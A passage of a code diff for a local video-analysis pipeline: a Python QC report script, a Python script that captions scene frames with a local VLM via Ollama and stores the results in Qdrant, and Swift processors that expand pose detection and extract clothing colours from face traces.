QC Report for all completed files.
Checks pipeline standards and lists missing/invalid items.
"""
import json
import os
import sys
import psycopg2
from pathlib import Path
OUTPUT_DIR = os.environ.get("MOMENTRY_OUTPUT_DIR", "/Users/accusys/momentry/output")
DATABASE_URL = os.environ.get("DATABASE_URL", "postgresql://accusys@localhost:5432/momentry")
# Required processor outputs
REQUIRED_PROCESSORS = ["face.json", "asr.json", "asrx.json", "ocr.json", "pose.json", "cut.json", "face_cluster.json", "face_traced.json", "profile.json"]
def get_db_connection():
return psycopg2.connect(DATABASE_URL)
def check_processor_files(uuid):
"""Check if all required processor output files exist."""
missing = []
for proc in REQUIRED_PROCESSORS:
path = Path(OUTPUT_DIR) / f"{uuid}.{proc}"
if not path.exists():
missing.append(proc)
return missing
def check_trace_profiles(conn, uuid):
"""Check trace_profiles data quality."""
with conn.cursor() as cur:
cur.execute("SELECT COUNT(*), SUM(frame_count), COUNT(CASE WHEN name IS NOT NULL AND name != '' THEN 1 END) FROM public.trace_profiles WHERE file_uuid = %s", (uuid,))
count, total_frames, named_count = cur.fetchone()
cur.execute("SELECT COUNT(*) FROM public.trace_profiles WHERE file_uuid = %s AND frame_count <= 0", (uuid,))
zero_frames = cur.fetchone()[0]
cur.execute("SELECT COUNT(*) FROM public.trace_profiles WHERE file_uuid = %s AND (vlm_description IS NULL OR vlm_description = '')", (uuid,))
no_vlm_desc = cur.fetchone()[0]
issues = []
if count == 0:
issues.append("trace_profiles: 0 records")
if zero_frames > 0:
issues.append(f"trace_profiles: {zero_frames} records with frame_count <= 0")
if no_vlm_desc > 0:
issues.append(f"trace_profiles: {no_vlm_desc} records missing vlm_description")
return issues
def check_tkg_nodes(conn, uuid):
"""Check TKG nodes data."""
with conn.cursor() as cur:
cur.execute("SELECT COUNT(*) FROM public.tkg_nodes WHERE file_uuid = %s AND node_type = 'face_track'", (uuid,))
face_tracks = cur.fetchone()[0]
cur.execute("SELECT COUNT(*) FROM public.tkg_edges WHERE file_uuid = %s", (uuid,))
edges = cur.fetchone()[0]
issues = []
if face_tracks == 0:
issues.append("tkg_nodes: 0 face_track nodes")
if edges == 0:
issues.append("tkg_edges: 0 edges")
return issues
def check_qdrant_faces(uuid):
"""Check Qdrant _faces collection using curl."""
try:
import subprocess
result = subprocess.run(
["curl", "-s", "http://localhost:6333/collections/_faces/points/scroll",
"-H", "Content-Type: application/json",
"-d", json.dumps({"filter": {"must": [{"key": "file_uuid", "match": {"value": uuid}}]}, "limit": 1})],
capture_output=True, text=True, timeout=5
)
if result.returncode == 0:
data = json.loads(result.stdout)
points = data.get("result", {}).get("points", [])
count = len(points)
return [] if count > 0 else [f"Qdrant _faces: {count} points"]
else:
return [f"Qdrant _faces: curl error"]
except Exception as e:
return [f"Qdrant _faces: error ({e})"]
def check_video_metadata(conn, uuid):
"""Check video metadata completeness."""
with conn.cursor() as cur:
cur.execute("SELECT file_name, duration, fps, total_frames, cut_done FROM public.videos WHERE file_uuid = %s", (uuid,))
row = cur.fetchone()
if not row:
return ["videos: record not found"]
name, duration, fps, total_frames, cut_done = row
issues = []
if duration <= 0:
issues.append(f"videos: duration={duration}")
if fps <= 0:
issues.append(f"videos: fps={fps}")
if total_frames <= 0:
issues.append(f"videos: total_frames={total_frames}")
if not cut_done:
issues.append("videos: cut_done=false")
return issues
def main():
conn = get_db_connection()
with conn.cursor() as cur:
cur.execute("SELECT file_uuid, file_name FROM public.videos WHERE status = 'completed' ORDER BY created_at DESC")
completed_files = cur.fetchall()
if not completed_files:
print("No completed files found.")
return
print("=" * 80)
print("QC REPORT FOR COMPLETED FILES")
print("=" * 80)
print(f"Total completed files: {len(completed_files)}")
print()
all_issues = []
for uuid, file_name in completed_files:
file_issues = []
# Check processor files
missing_procs = check_processor_files(uuid)
if missing_procs:
file_issues.append(f"Missing processor files: {', '.join(missing_procs)}")
# Check video metadata
file_issues.extend(check_video_metadata(conn, uuid))
# Check trace_profiles
file_issues.extend(check_trace_profiles(conn, uuid))
# Check TKG
file_issues.extend(check_tkg_nodes(conn, uuid))
# Check Qdrant
file_issues.extend(check_qdrant_faces(uuid))
status = "PASS" if not file_issues else "FAIL"
print(f"[{status}] {file_name} ({uuid})")
for issue in file_issues:
print(f" - {issue}")
print()
if file_issues:
all_issues.append((file_name, uuid, file_issues))
print("=" * 80)
print(f"SUMMARY: {len(completed_files) - len(all_issues)}/{len(completed_files)} files passed QC")
if all_issues:
print(f"\nFailed files:")
for name, uuid, issues in all_issues:
print(f" - {name}: {len(issues)} issue(s)")
if __name__ == "__main__":
main()
+330
View File
@@ -0,0 +1,330 @@
#!/opt/homebrew/bin/python3.11
"""
Scene VLM Caption - Generate VLM descriptions for scene key frames
Analyzes scene key frames ({uuid}_scene_N.jpg) using VLM (llava:7b).
Usage:
python scene_vlm_caption.py --file-uuid abc123 --output-dir /path/to/output
python scene_vlm_caption.py --scene-dir /path/to/output --scene-number 1
Output:
{output_dir}/{uuid}_scene_profile.json with:
- scenes: [{scene_number, vlm_description, vlm_location, ...}]
"""
import argparse
import base64
import json
import os
import sys
from pathlib import Path
try:
import requests
except ImportError:
print("requests not installed: pip install requests", file=sys.stderr)
sys.exit(1)
def encode_image(image_path: str) -> str:
"""Encode image to base64."""
with open(image_path, "rb") as f:
return base64.b64encode(f.read()).decode("utf-8")
def call_vlm(image_path: str, prompt: str, model: str = "llava:7b", ollama_url: str = "http://localhost:11434") -> str:
"""Call Ollama VLM API."""
image_b64 = encode_image(image_path)
payload = {
"model": model,
"prompt": prompt,
"images": [image_b64],
"stream": False,
"options": {"num_predict": 100}
}
try:
resp = requests.post(f"{ollama_url}/api/generate", json=payload, timeout=30)
resp.raise_for_status()
data = resp.json()
return data.get("response", "").strip()
except Exception as e:
print(f"[vlm] API error: {e}", file=sys.stderr)
return ""
def get_embedding(text: str, model: str = "nomic-embed-text-v2-moe", ollama_url: str = "http://localhost:11434") -> list:
"""Get embedding from Ollama."""
try:
resp = requests.post(
f"{ollama_url}/api/embed",
json={"model": model, "input": text},
timeout=30,
)
resp.raise_for_status()
data = resp.json()
return data.get("embeddings", [[]])[0]
except Exception as e:
print(f"[vlm] Embedding error: {e}", file=sys.stderr)
return []
def store_to_qdrant(analysis: dict, file_uuid: str, scene_number: int, qdrant_url: str = "http://localhost:6333", qdrant_api_key: str = None) -> bool:
"""Store VLM results to Qdrant _vlm collection."""
description = analysis.get("vlm_description", "")
if not description:
return False
# Get embedding
embedding = get_embedding(description)
if not embedding:
print(f"[vlm] Failed to get embedding for scene_{scene_number}", file=sys.stderr)
return False
# Generate point ID
import hashlib
point_id = int(hashlib.md5(f"{file_uuid}_scene_{scene_number}".encode()).hexdigest()[:16], 16)
# Build payload
payload = {
"type": "scene",
"file_uuid": file_uuid,
"scene_number": scene_number,
**analysis,
}
# Upsert to Qdrant
try:
headers = {}
if qdrant_api_key:
headers["api-key"] = qdrant_api_key
resp = requests.put(
f"{qdrant_url}/collections/_vlm/points?wait=true",
json={
"points": [{
"id": point_id,
"vector": embedding,
"payload": payload,
}]
},
headers=headers,
timeout=30,
)
resp.raise_for_status()
print(f"[vlm] Stored to Qdrant: scene_{scene_number}")
return True
except Exception as e:
print(f"[vlm] Qdrant error: {e}", file=sys.stderr)
return False
def analyze_scene(image_path: str, model: str = "llava:7b") -> dict:
"""
Analyze a scene key frame with VLM.
Returns:
Dict with VLM analysis results
"""
if not Path(image_path).exists():
print(f"[vlm] Image not found: {image_path}", file=sys.stderr)
return {}
print(f"[vlm] Analyzing {Path(image_path).name}...")
# Prompt 1: Scene description
desc_prompt = "Describe this scene briefly. Include: location type, main objects, people count, activity. If uncertain, say 'unclear'. Do not guess."
description = call_vlm(image_path, desc_prompt, model)
# Prompt 2: Lighting
light_prompt = "What is the lighting? Answer one word: day, night, indoor-light, mixed, or unknown."
lighting = call_vlm(image_path, light_prompt, model).lower().strip()
# Prompt 3: Location classification
loc_prompt = "Classify the location. Answer in JSON: {\"location\": \"indoor/outdoor/unknown\", \"setting\": \"office/street/home/nature/studio/unknown\"}. Use 'unknown' if uncertain."
loc_raw = call_vlm(image_path, loc_prompt, model)
loc_data = {}
try:
loc_clean = loc_raw.replace("```json", "").replace("```", "").strip()
parsed = json.loads(loc_clean)
if isinstance(parsed, dict):
loc_data = parsed
else:
loc_data = {}
except:
loc_data = {}
# Prompt 4: Weather (for outdoor scenes)
weather_prompt = "If outdoor, what is the weather? Answer one word: sunny, cloudy, rainy, night, or unknown. If indoor, answer 'indoor'."
weather = call_vlm(image_path, weather_prompt, model).lower().strip()
# Prompt 5: People count
people_prompt = "How many people are visible? Answer a number or 'unclear'."
people_count = call_vlm(image_path, people_prompt, model).strip()
# Prompt 6: Objects/vehicles
objects_prompt = "What notable objects or vehicles are visible? Answer in JSON: {\"vehicles\": [\"car\", \"bus\", etc.], \"objects\": [\"table\", \"chair\", etc.]}. Use empty lists if none or unclear."
objects_raw = call_vlm(image_path, objects_prompt, model)
objects_data = {}
try:
objects_clean = objects_raw.replace("```json", "").replace("```", "").strip()
parsed = json.loads(objects_clean)
if isinstance(parsed, dict):
objects_data = parsed
else:
objects_data = {"vehicles": [], "objects": []}
except:
objects_data = {"vehicles": [], "objects": []}
# Prompt 7: Plants
plants_prompt = "What plants are visible? Answer in JSON: {\"has_plants\": true/false, \"plants\": [\"list recognizable names or brief descriptions\"]. Use empty list if none or unclear.}"
plants_raw = call_vlm(image_path, plants_prompt, model)
plants_data = {}
try:
plants_clean = plants_raw.replace("```json", "").replace("```", "").strip()
parsed = json.loads(plants_clean)
if isinstance(parsed, dict):
plants_data = parsed
else:
plants_data = {"has_plants": False, "plants": []}
except:
plants_data = {"has_plants": False, "plants": []}
# Prompt 8: Animals
animals_prompt = "What animals are visible? Answer in JSON: {\"has_animals\": true/false, \"animals\": [\"list recognizable names or brief descriptions\"]. Use empty list if none or unclear.}"
animals_raw = call_vlm(image_path, animals_prompt, model)
animals_data = {}
try:
animals_clean = animals_raw.replace("```json", "").replace("```", "").strip()
parsed = json.loads(animals_clean)
if isinstance(parsed, dict):
animals_data = parsed
else:
animals_data = {"has_animals": False, "animals": []}
except:
animals_data = {"has_animals": False, "animals": []}
# Prompt 9: Tags
tags_prompt = "List 5 tags for this scene, comma-separated. Only include what is clearly visible. Examples: office, street, sunny, crowd, nature."
tags_raw = call_vlm(image_path, tags_prompt, model)
tags = [t.strip() for t in tags_raw.replace(",", " ").split() if t.strip()][:5]
return {
"vlm_description": description,
"vlm_lighting": lighting,
"vlm_location": loc_data.get("location", "unknown"),
"vlm_setting": loc_data.get("setting", "unknown"),
"vlm_weather": weather,
"vlm_people_count": people_count,
"vlm_vehicles": objects_data.get("vehicles", []),
"vlm_objects": objects_data.get("objects", []),
"vlm_has_plants": plants_data.get("has_plants", False),
"vlm_plants": plants_data.get("plants", []),
"vlm_has_animals": animals_data.get("has_animals", False),
"vlm_animals": animals_data.get("animals", []),
"vlm_tags": tags,
"vlm_model": model,
}
def analyze_all_scenes(file_uuid: str, output_dir: str, model: str = "llava:7b", store_qdrant: bool = True) -> dict:
"""
Analyze all scene key frames for a file.
Returns:
Summary dict
"""
output_path = Path(output_dir)
# Find all scene images
scene_images = sorted(output_path.glob(f"{file_uuid}_scene_*.jpg"))
if not scene_images:
print(f"[vlm] No scene images found: {file_uuid}_scene_*.jpg in {output_dir}", file=sys.stderr)
return {"error": "No scene images"}
results = []
qdrant_api_key = os.environ.get("QDRANT_API_KEY")
for scene_img in scene_images:
# Extract scene number from filename
scene_number = int(scene_img.stem.split("_scene_")[1])
analysis = analyze_scene(str(scene_img), model)
if analysis:
# Store to Qdrant
if store_qdrant:
store_to_qdrant(analysis, file_uuid, scene_number, qdrant_api_key=qdrant_api_key)
results.append({
"scene_number": scene_number,
"image_path": str(scene_img),
**analysis,
})
# Save profile
profile = {
"file_uuid": file_uuid,
"total_scenes": len(results),
"model": model,
"scenes": results,
}
profile_path = output_path / f"{file_uuid}_scene_profile.json"
with open(profile_path, "w") as f:
json.dump(profile, f, indent=2)
print(f"[vlm] Saved profile: {profile_path}")
return profile
def main():
parser = argparse.ArgumentParser(description="VLM caption generation for scene key frames")
parser.add_argument("--file-uuid", "-u", help="File UUID (analyze all scenes)")
parser.add_argument("--scene-dir", "-d", help="Scene directory (contains {uuid}_scene_N.jpg)")
parser.add_argument("--scene-number", "-n", type=int, help="Single scene number")
parser.add_argument("--output-dir", "-o", default="/Users/accusys/momentry/output", help="Output directory")
parser.add_argument("--model", "-m", default="llava:7b", help="VLM model name")
parser.add_argument("--json", "-j", action="store_true", help="Output as JSON")
args = parser.parse_args()
if args.file_uuid:
result = analyze_all_scenes(args.file_uuid, args.output_dir, args.model)
elif args.scene_dir and args.scene_number is not None:
# Find file_uuid from directory
scene_dir = Path(args.scene_dir)
file_uuid = None
for f in scene_dir.glob("*_scene_*.jpg"):
file_uuid = f.stem.split("_scene_")[0]
break
if not file_uuid:
print("Cannot determine file_uuid from scene_dir", file=sys.stderr)
sys.exit(1)
scene_img = scene_dir / f"{file_uuid}_scene_{args.scene_number}.jpg"
result = analyze_scene(str(scene_img), args.model)
else:
parser.error("Requires --file-uuid or (--scene-dir + --scene-number)")
if args.json:
print(json.dumps(result, indent=2))
else:
if "scenes" in result:
print(f"Analyzed {len(result['scenes'])} scenes")
elif "vlm_description" in result:
print(f"Description: {result['vlm_description']}")
print(f"Location: {result.get('vlm_location', 'unknown')}")
print(f"Tags: {result.get('vlm_tags', [])}")
if __name__ == "__main__":
main()
+16
View File
@@ -126,5 +126,21 @@ let package = Package(
path: ".",
sources: ["swift_face_pose.swift"]
),
.executableTarget(
name: "swift_pose_expansion",
dependencies: [
.product(name: "ArgumentParser", package: "swift-argument-parser"),
],
path: ".",
sources: ["swift_pose_expansion.swift"]
),
.executableTarget(
name: "swift_appearance_expansion",
dependencies: [
.product(name: "ArgumentParser", package: "swift-argument-parser"),
],
path: ".",
sources: ["swift_appearance_expansion.swift"]
),
]
)
@@ -0,0 +1,332 @@
import Foundation
import Vision
import ArgumentParser
import AVFoundation
/// Swift Appearance Expansion Processor V2
///
/// Reads pose.json and extracts colors at keypoint positions.
///
/// Algorithm:
/// 1. Load pose.json, get frames with trace_id
/// 2. For each pose frame, extract colors at keypoint positions
/// 3. Record overall brightness for lighting adjustment
/// 4. Expand outward, stop when 3 consecutive frames have low similarity
/// 5. Output at 8Hz sampling
///
/// Key Concepts:
/// - Appearance = colors at body part positions (head, torso, legs, feet)
/// - Used for tracking and agent search ("person wearing red shirt")
/// - Approximate colors are sufficient for top-K search
@main
struct SwiftAppearanceExpansion: ParsableCommand {
@Argument(help: "Video file path")
var videoPath: String
@Argument(help: "Input pose.json path")
var posePath: String
@Argument(help: "Output appearance.json path")
var outputPath: String
@Option(name: .long, help: "UUID for logging")
var uuid: String = ""
@Option(name: .long, help: "Consecutive miss threshold (default: 3)")
var missThreshold: Int = 3
@Option(name: .long, help: "Color sampling radius (default: 15)")
var colorRadius: Int = 15
mutating func run() throws {
let startTime = Date()
print("[AppearanceExpansion] Starting appearance extraction from pose: \(videoPath)")
// Load pose.json
guard let poseData = try? Data(contentsOf: URL(fileURLWithPath: posePath)) else {
print("[AppearanceExpansion] ERROR: Cannot read \(posePath)")
return
}
guard let poseJson = try? JSONSerialization.jsonObject(with: poseData) as? [String: Any] else {
print("[AppearanceExpansion] ERROR: Invalid JSON in \(posePath)")
return
}
// Extract frames with trace_id from pose
var poseFrameDict: [Int: [String: Any]] = [:] // frame -> pose data with trace_id
if let frames = poseJson["frames"] as? [[String: Any]] {
for frameData in frames {
guard let frameNum = frameData["frame"] as? Int else { continue }
poseFrameDict[frameNum] = frameData
}
}
print("[AppearanceExpansion] Found \(poseFrameDict.count) pose frames in \(posePath)")
if poseFrameDict.isEmpty {
print("[AppearanceExpansion] No pose frames found, skipping")
let emptyOutput: [String: Any] = ["frame_count": 0, "fps": 0.0, "frames": []]
let jsonData = try JSONSerialization.data(withJSONObject: emptyOutput, options: [])
try jsonData.write(to: URL(fileURLWithPath: outputPath))
return
}
// Get video info
let url = URL(fileURLWithPath: videoPath)
let asset = AVAsset(url: url)
guard let videoTrack = asset.tracks(withMediaType: .video).first else {
print("[AppearanceExpansion] ERROR: No video track")
return
}
let fps = videoTrack.nominalFrameRate
let duration = CMTimeGetSeconds(asset.duration)
let totalFrames = Int(duration * Double(fps))
let sampleInterval = max(1, Int(floor(Double(fps) / 8.0)))
print("[AppearanceExpansion] Video: \(fps)fps, \(totalFrames) frames, 8Hz interval=\(sampleInterval)")
// Track appearance frames
var appearanceFrameDict: [Int: [String: Any]] = [:]
// Setup asset reader
let outputSettings: [String: Any] = [
kCVPixelBufferPixelFormatTypeKey as String: kCVPixelFormatType_32BGRA
]
let reader = try AVAssetReader(asset: asset)
let trackOutput = AVAssetReaderTrackOutput(track: videoTrack, outputSettings: outputSettings)
trackOutput.alwaysCopiesSampleData = false
reader.add(trackOutput)
guard reader.startReading() else {
print("[AppearanceExpansion] ERROR: Cannot start reader")
return
}
// Process frames
var frameIndex = 0
while let sampleBuffer = trackOutput.copyNextSampleBuffer() {
defer { frameIndex += 1 }
guard let pixelBuffer = CMSampleBufferGetImageBuffer(sampleBuffer) else {
continue
}
// Check if this is a pose frame
if let poseData = poseFrameDict[frameIndex] {
let seconds = Double(frameIndex) / Double(fps)
// Extract colors at keypoint positions
let colors = extractColorsAtKeypoints(pixelBuffer: pixelBuffer, poseData: poseData, radius: colorRadius)
// Calculate overall brightness
let brightness = calculateBrightness(pixelBuffer: pixelBuffer)
// Get trace_id from pose (inherit)
let traceId = poseData["trace_id"] as? Int ?? 0
appearanceFrameDict[frameIndex] = [
"frame": frameIndex,
"timestamp": seconds,
"trace_id": traceId,
"brightness": brightness,
"colors": colors
]
}
// Progress logging
if frameIndex % 5000 == 0 {
let elapsed = Date().timeIntervalSince(startTime)
print("[AppearanceExpansion] Frame \(frameIndex)/\(totalFrames), \(appearanceFrameDict.count) appearances, \(Int(elapsed))s")
fflush(stdout)
}
}
reader.cancelReading()
print("[AppearanceExpansion] Extraction done: \(appearanceFrameDict.count) frames with appearance")
// 8Hz sampling output
var outputFrames: [[String: Any]] = []
let sortedAppearanceFrames = appearanceFrameDict.keys.sorted()
var targetFrame = 0
while targetFrame < totalFrames {
// Find closest appearance frame to target
var closestFrame: Int? = nil
var closestDist = Int.max
for appFrame in sortedAppearanceFrames {
let dist = abs(appFrame - targetFrame)
if dist < closestDist && dist <= sampleInterval {
closestDist = dist
closestFrame = appFrame
}
}
if let cf = closestFrame, let data = appearanceFrameDict[cf] {
outputFrames.append(data)
}
targetFrame += sampleInterval
}
// Write output
let output: [String: Any] = [
"frame_count": outputFrames.count,
"fps": Double(fps),
"frames": outputFrames
]
let jsonData = try JSONSerialization.data(withJSONObject: output, options: [])
try jsonData.write(to: URL(fileURLWithPath: outputPath))
let elapsed = Date().timeIntervalSince(startTime)
print("[AppearanceExpansion] Done: \(outputFrames.count) frames at 8Hz, \(String(format: "%.1f", elapsed))s → \(outputPath)")
}
/// Extract colors at keypoint positions
func extractColorsAtKeypoints(pixelBuffer: CVPixelBuffer, poseData: [String: Any], radius: Int) -> [String: [Int]] {
let imgW = CVPixelBufferGetWidth(pixelBuffer)
let imgH = CVPixelBufferGetHeight(pixelBuffer)
CVPixelBufferLockBaseAddress(pixelBuffer, .readOnly)
defer { CVPixelBufferUnlockBaseAddress(pixelBuffer, .readOnly) }
guard let baseAddress = CVPixelBufferGetBaseAddress(pixelBuffer) else {
return [:]
}
let bytesPerRow = CVPixelBufferGetBytesPerRow(pixelBuffer)
let buffer = baseAddress.bindMemory(to: UInt8.self, capacity: bytesPerRow * imgH)
var colors: [String: [Int]] = [:]
// Define keypoint groups for body parts
let bodyParts: [String: [String]] = [
"head": ["nose", "left_eye", "right_eye", "left_ear", "right_ear"],
"torso": ["left_shoulder", "right_shoulder"],
"legs": ["left_hip", "right_hip", "left_knee", "right_knee"],
"feet": ["left_ankle", "right_ankle"]
]
// Extract color for each body part
for (partName, keypointNames) in bodyParts {
var totalR = 0, totalG = 0, totalB = 0
var count = 0
// Get persons array from pose data
if let persons = poseData["persons"] as? [[String: Any]] {
for person in persons {
if let keypoints = person["keypoints"] as? [[String: Any]] {
for kp in keypoints {
guard let name = kp["name"] as? String,
keypointNames.contains(name),
let x = kp["x"] as? Double,
let y = kp["y"] as? Double,
let confidence = kp["confidence"] as? Double,
confidence > 0.3 else { continue }
// Get average color around keypoint
let color = getAverageColor(
buffer: buffer,
bytesPerRow: bytesPerRow,
imgW: imgW,
imgH: imgH,
centerX: Int(x),
centerY: Int(y),
radius: radius
)
totalR += color.0
totalG += color.1
totalB += color.2
count += 1
}
}
}
}
if count > 0 {
colors[partName] = [totalR / count, totalG / count, totalB / count]
}
}
return colors
}
/// Get average color around a position
func getAverageColor(
buffer: UnsafeMutablePointer<UInt8>,
bytesPerRow: Int,
imgW: Int,
imgH: Int,
centerX: Int,
centerY: Int,
radius: Int
) -> (Int, Int, Int) {
let x1 = max(0, centerX - radius)
let x2 = min(imgW - 1, centerX + radius)
let y1 = max(0, centerY - radius)
let y2 = min(imgH - 1, centerY + radius)
var totalR = 0, totalG = 0, totalB = 0, count = 0
for y in y1...y2 {
let rowStart = y * bytesPerRow
for x in x1...x2 {
let offset = rowStart + x * 4
totalB += Int(buffer[offset])
totalG += Int(buffer[offset + 1])
totalR += Int(buffer[offset + 2])
count += 1
}
}
if count > 0 {
return (totalR / count, totalG / count, totalB / count)
}
return (0, 0, 0)
}
/// Calculate overall brightness of frame
func calculateBrightness(pixelBuffer: CVPixelBuffer) -> Double {
let imgW = CVPixelBufferGetWidth(pixelBuffer)
let imgH = CVPixelBufferGetHeight(pixelBuffer)
CVPixelBufferLockBaseAddress(pixelBuffer, .readOnly)
defer { CVPixelBufferUnlockBaseAddress(pixelBuffer, .readOnly) }
guard let baseAddress = CVPixelBufferGetBaseAddress(pixelBuffer) else {
return 0.0
}
let bytesPerRow = CVPixelBufferGetBytesPerRow(pixelBuffer)
let buffer = baseAddress.bindMemory(to: UInt8.self, capacity: bytesPerRow * imgH)
var totalBrightness = 0.0
var count = 0
// Sample every 10 pixels for speed
for y in stride(from: 0, to: imgH, by: 10) {
let rowStart = y * bytesPerRow
for x in stride(from: 0, to: imgW, by: 10) {
let offset = rowStart + x * 4
let b = Double(buffer[offset])
let g = Double(buffer[offset + 1])
let r = Double(buffer[offset + 2])
// Calculate luminance
let luminance = 0.299 * r + 0.587 * g + 0.114 * b
totalBrightness += luminance / 255.0
count += 1
}
}
return count > 0 ? totalBrightness / Double(count) : 0.0
}
}
@@ -0,0 +1,376 @@
import Foundation
import Vision
import ArgumentParser
import AVFoundation
/// Swift Pose Expansion Processor V2
///
/// Reads face_traced.json (from face tracking) and expands pose detection from trace frames.
/// Inherits trace_id from face traces for proper tracking continuity.
///
/// Algorithm:
/// 1. Load face_traced.json, extract frames grouped by trace_id
/// 2. For each trace_id, start from face frames and expand forward/backward
/// 3. Stop expansion when 3 consecutive frames have no pose detection
/// 4. Associate each pose with the nearest face's trace_id
/// 5. Output pose.json at 8Hz sampling (floor(fps/8) interval)
@main
struct SwiftPoseExpansion: ParsableCommand {
@Argument(help: "Video file path")
var videoPath: String
@Argument(help: "Input face_traced.json path")
var faceTracedPath: String
@Argument(help: "Output pose.json path")
var outputPath: String
@Option(name: .long, help: "UUID for logging")
var uuid: String = ""
@Option(name: .long, help: "Consecutive miss threshold to stop expansion (default: 3)")
var missThreshold: Int = 3
mutating func run() throws {
let startTime = Date()
print("[PoseExpansion] Starting pose expansion from face traces: \(videoPath)")
// Load face_traced.json
guard let faceData = try? Data(contentsOf: URL(fileURLWithPath: faceTracedPath)) else {
print("[PoseExpansion] ERROR: Cannot read \(faceTracedPath)")
return
}
guard let faceJson = try? JSONSerialization.jsonObject(with: faceData) as? [String: Any] else {
print("[PoseExpansion] ERROR: Invalid JSON in \(faceTracedPath)")
return
}
// Extract frames with trace_id mapping
// frameToTraces: frame -> [(trace_id, x, y, w, h)]
var frameToTraces: [Int: [(traceId: Int, x: Double, y: Double, w: Double, h: Double)]] = [:]
var allTraceIds: Set<Int> = []
// Handle both dict and list format
if let framesDict = faceJson["frames"] as? [String: Any] {
for (frameStr, frameData) in framesDict {
guard let frameNum = Int(frameStr) else { continue }
if let faces = (frameData as? [String: Any])?["faces"] as? [[String: Any]] {
for face in faces {
if let traceId = face["trace_id"] as? Int, traceId > 0 {
allTraceIds.insert(traceId)
let bbox = face["bbox"] as? [String: Any]
let x = bbox?["x"] as? Double ?? face["x"] as? Double ?? 0
let y = bbox?["y"] as? Double ?? face["y"] as? Double ?? 0
let w = bbox?["width"] as? Double ?? face["width"] as? Double ?? 0
let h = bbox?["height"] as? Double ?? face["height"] as? Double ?? 0
frameToTraces[frameNum, default: []].append((traceId, x, y, w, h))
}
}
}
}
} else if let framesList = faceJson["frames"] as? [[String: Any]] {
for frameData in framesList {
guard let frameNum = frameData["frame"] as? Int else { continue }
if let faces = frameData["faces"] as? [[String: Any]] {
for face in faces {
if let traceId = face["trace_id"] as? Int, traceId > 0 {
allTraceIds.insert(traceId)
let bbox = face["bbox"] as? [String: Any]
let x = bbox?["x"] as? Double ?? face["x"] as? Double ?? 0
let y = bbox?["y"] as? Double ?? face["y"] as? Double ?? 0
let w = bbox?["width"] as? Double ?? face["width"] as? Double ?? 0
let h = bbox?["height"] as? Double ?? face["height"] as? Double ?? 0
frameToTraces[frameNum, default: []].append((traceId, x, y, w, h))
}
}
}
}
}
print("[PoseExpansion] Found \(allTraceIds.count) traces, \(frameToTraces.count) frames in \(faceTracedPath)")
if frameToTraces.isEmpty {
print("[PoseExpansion] No traces found, skipping pose expansion")
let emptyOutput: [String: Any] = ["frame_count": 0, "fps": 0.0, "frames": []]
let jsonData = try JSONSerialization.data(withJSONObject: emptyOutput, options: [])
try jsonData.write(to: URL(fileURLWithPath: outputPath))
return
}
// Get video info
let url = URL(fileURLWithPath: videoPath)
let asset = AVAsset(url: url)
guard let videoTrack = asset.tracks(withMediaType: .video).first else {
print("[PoseExpansion] ERROR: No video track")
return
}
let fps = videoTrack.nominalFrameRate
let duration = CMTimeGetSeconds(asset.duration)
let totalFrames = Int(duration * Double(fps))
let sampleInterval = max(1, Int(floor(Double(fps) / 8.0)))
print("[PoseExpansion] Video: \(fps)fps, \(totalFrames) frames, 8Hz interval=\(sampleInterval)")
// Build set of all face frames
let allFaceFrameSet = Set(frameToTraces.keys)
// Track which frames have pose with trace_id
var poseFrameDict: [Int: [String: Any]] = [:]
// Setup asset reader
let outputSettings: [String: Any] = [
kCVPixelBufferPixelFormatTypeKey as String: kCVPixelFormatType_32BGRA
]
let reader = try AVAssetReader(asset: asset)
let trackOutput = AVAssetReaderTrackOutput(track: videoTrack, outputSettings: outputSettings)
trackOutput.alwaysCopiesSampleData = false
reader.add(trackOutput)
guard reader.startReading() else {
print("[PoseExpansion] ERROR: Cannot start reader")
return
}
// Process frames
var frameIndex = 0
var consecutiveMisses = 0
var activeTraceIds: Set<Int> = [] // Currently active traces being expanded
while let sampleBuffer = trackOutput.copyNextSampleBuffer() {
defer { frameIndex += 1 }
guard let pixelBuffer = CMSampleBufferGetImageBuffer(sampleBuffer) else {
continue
}
// Check if this frame has face traces
let faceTraces = frameToTraces[frameIndex]
let isFaceFrame = faceTraces != nil && !faceTraces!.isEmpty
if isFaceFrame, let traces = faceTraces {
// Update active traces
for ft in traces {
activeTraceIds.insert(ft.traceId)
}
consecutiveMisses = 0
}
// Check if we should process this frame
let shouldProcess = isFaceFrame ||
(consecutiveMisses < missThreshold * sampleInterval && !activeTraceIds.isEmpty)
if shouldProcess {
let poseResult = detectPose(pixelBuffer: pixelBuffer)
if poseResult.hasPose {
let seconds = Double(frameIndex) / Double(fps)
// Determine trace_id for this pose
var traceId = 0
if isFaceFrame, let traces = faceTraces {
// Use the trace_id from face (may need bbox matching for multi-person)
// For now, use the first trace_id found
traceId = traces.first?.traceId ?? 0
} else {
// Inherit from nearest face frame with active trace
let nearestFaceFrame = findNearestFaceFrame(
frameIndex: frameIndex,
frameToTraces: frameToTraces,
activeTraceIds: activeTraceIds
)
if let nearest = nearestFaceFrame, let traces = frameToTraces[nearest] {
traceId = traces.first?.traceId ?? 0
}
}
poseFrameDict[frameIndex] = [
"frame": frameIndex,
"timestamp": seconds,
"trace_id": traceId,
"persons": poseResult.persons
]
consecutiveMisses = 0
} else {
consecutiveMisses += 1
}
}
// Progress logging
if frameIndex % 5000 == 0 {
let elapsed = Date().timeIntervalSince(startTime)
print("[PoseExpansion] Frame \(frameIndex)/\(totalFrames), \(poseFrameDict.count) poses, \(Int(elapsed))s")
fflush(stdout)
}
}
reader.cancelReading()
print("[PoseExpansion] Detection done: \(poseFrameDict.count) frames with pose")
// 8Hz sampling output
var outputFrames: [[String: Any]] = []
let sortedPoseFrames = poseFrameDict.keys.sorted()
var targetFrame = 0
while targetFrame < totalFrames {
// Find closest pose frame to target
var closestFrame: Int? = nil
var closestDist = Int.max
for poseFrame in sortedPoseFrames {
let dist = abs(poseFrame - targetFrame)
if dist < closestDist && dist <= sampleInterval {
closestDist = dist
closestFrame = poseFrame
}
}
if let cf = closestFrame, let data = poseFrameDict[cf] {
outputFrames.append(data)
}
targetFrame += sampleInterval
}
// Write output
let output: [String: Any] = [
"frame_count": outputFrames.count,
"fps": Double(fps),
"frames": outputFrames
]
let jsonData = try JSONSerialization.data(withJSONObject: output, options: [])
try jsonData.write(to: URL(fileURLWithPath: outputPath))
let elapsed = Date().timeIntervalSince(startTime)
print("[PoseExpansion] Done: \(outputFrames.count) frames at 8Hz, \(String(format: "%.1f", elapsed))s → \(outputPath)")
}
/// Find nearest face frame with active trace
func findNearestFaceFrame(
